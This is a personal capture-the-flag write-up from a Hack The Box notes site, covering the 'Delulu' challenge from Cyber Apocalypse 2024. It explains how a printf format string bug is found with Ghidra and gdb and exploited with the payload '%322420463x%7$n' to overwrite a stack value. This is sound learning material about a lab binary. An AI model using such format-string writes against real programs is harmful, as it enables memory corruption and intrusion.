HTB Writeups
  • HTB Writeups
  • Boxes: Very Easy
    • Academy
    • Archetype
    • Arctic
    • Base
    • Bike
    • Blue
    • Explosion
    • Included
    • Markup
    • Oopsie
    • Redeemer
    • Responder
    • Shield
    • Unified
    • Vaccine
  • Boxes: Easy
    • Analytics
    • Armageddon
    • Bashed
    • Beep
    • Blocky
    • Bounty Hunter
    • Buff
    • Cap
    • CozyHosting
    • Devel
    • Explore
    • Forest
    • Grandpa
    • Granny
    • Horizontall
    • Jerry
    • Keeper
    • Knife
    • Lame
    • Late
    • Legacy
    • Mirai
    • Netmon
    • Nibbles
    • Optimum
    • Paper
    • Photobomb
    • Precious
    • RedPanda
    • Return
    • Sau
    • ScriptKiddie
    • Sense
    • Servmon
    • Shocker
    • Shoppy
    • Squashed
    • Trick
  • Boxes: Medium
    • Poison
  • Challenges
    • Behind the Scenes
    • Canvas
    • Debugging Interface
    • Digital Cube
    • Easy Phish
    • Find the Easy Pass
    • Forest
    • Infiltration
    • misDIRection
    • Pusheen Loves Graphs
    • Retro
    • Signals
    • The Secret of a Queen
    • Wrong Spooky Season
  • Fortresses
  • Cyber Apocalypse 2023: The Cursed Mission
    • The Cursed Mission
    • Alien Cradle
    • Critical Flight
    • Debug
    • Extraterrestrial Persistence
    • Getting Started
    • Needle in the Haystack
    • Orbital
    • Packet Cyclone
    • Passman
    • Perfect Sync
    • Persistence
    • Plaintext Tleasure
    • Questionnaire
    • Reconfiguration
    • Relic Maps
    • Roten
    • Secret Code
    • Shattered Tablet
    • Small StEps
  • Hack the Boo 2023
    • Hauntmart
    • Spellbrewery
    • Trick or Treat
    • Valhalloween
  • Cyber Apocalypse 2024: Hacker Royale
    • Hacker Royale
    • An Unusual Sighting
    • BoxCutter
    • BunnyPass
    • Character
    • Data Siege
    • Delulu
    • Dynastic
    • Fake Boost
    • Flag Command
    • Game Invitation
    • It has begun
    • KORP Terminal
    • Labyrinth Linguist
    • LockTalk
    • Lucky Faucet
    • Makeshift
    • Maze
    • Packed Away
    • Phreaky
    • Primary Knowledge
    • Pursue the Tracks
    • Rids
    • Russian Roulette
    • Stop Drop and Roll
    • Testimonial
    • TimeKORP
    • Unbreakable
    • Urgent
  • CYBER APOCALYPSE 2025: Tales from Eldoria
    • Tales from Eldoria
    • A New Hire
    • Cave Expedition
    • Echoes in Stone
    • Eldorion
    • Embassy
    • EncryptedScroll
    • HeliosDEX
    • Quack Quack
    • Silent Trap
    • Stealth Invasion
    • Tales for the Brave
    • The Ancient Citadel
    • The Hillside Haven
    • The Stone That Whispers
    • Thorins Amulet
    • ToolPie
    • Traces
    • Trial by Fire
    • Whispers of the Moonbeam
Powered by GitBook
On this page
  1. Cyber Apocalypse 2024: Hacker Royale

Delulu

Personal Rating: Hard

PreviousData SiegeNextDynastic

Last updated 1 year ago

I checked out the file with Ghidra and had a look at the main function:

I patched 0x1337beef to 0x1337babe here to test the delulu function.

we need to overwrite two bytes and replace 'beef' with 'babe', most likely with an overflow.

I tried it with gdb. Since the read function reads 0x1f (31) chars, I created a file input.txt with 31 As and a lot of trailing Bs

I then found out the address after the read function when the program is run and set a breakpoint there.

I then ran the thing with run < input.txt and inspected the stack with si step by step. 32 Characters are read, the last of which is a B, but we did not overwrite anything :(

A friend of mine solved the challenge and told me how he did it. I did not know this attack, but I want to learn to do it myself:

Logging at the main function again, the interesting part takes place here:

The stack overflow did not work, so the issue should be somewhere else. Since the printf statement is made directly before the impossible check, I simply searched for printf vulnerability and found a lot of articles about overflows, which is very interesting.

It is said that %n can be used to write the number of so far emitted characters to the stack. So maybe if we can write 322420463, which is 0x1337beef in decimal, we can write that to the stack and overwrite 0x1337babe with that.

Lets play around with this at the program using gdb and an input file.

Back to main after read:

0x5555555554ab Interesting.

We see the value 0x1337babe there

>> %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x

[!] Checking.. 6ff22560.00000000.b7314887.00000010.7fffffff.1337babe.

This was the payload that my friend came up with:

%322420463x%7$n

Here is how it works:

%322420463x # Padding of 322420463 characters, which is 0x1337beef in hex

%7 # Offset of 7, as the target string 0x1337babe is set at the 7th argument on the stack

$n # Writes the number of preceding chars (0x1337beef) to the stack, with the offset given before (7)

So this generates a padding of 0x1337beef characters and then writes the number of given characters to the stack with a specified offset.

To determine the required offset, we can use %4x then %5x and so on until the value 0x1337babe is output. This was the case at %6x. Then we know that we have to write at the next value, so at offset 7.

https://owasp.org/www-community/attacks/Format_string_attack
https://security.stackexchange.com/questions/43574/how-is-printf-in-c-c-a-buffer-overflow-vulnerability
https://axcheron.github.io/exploit-101-format-strings/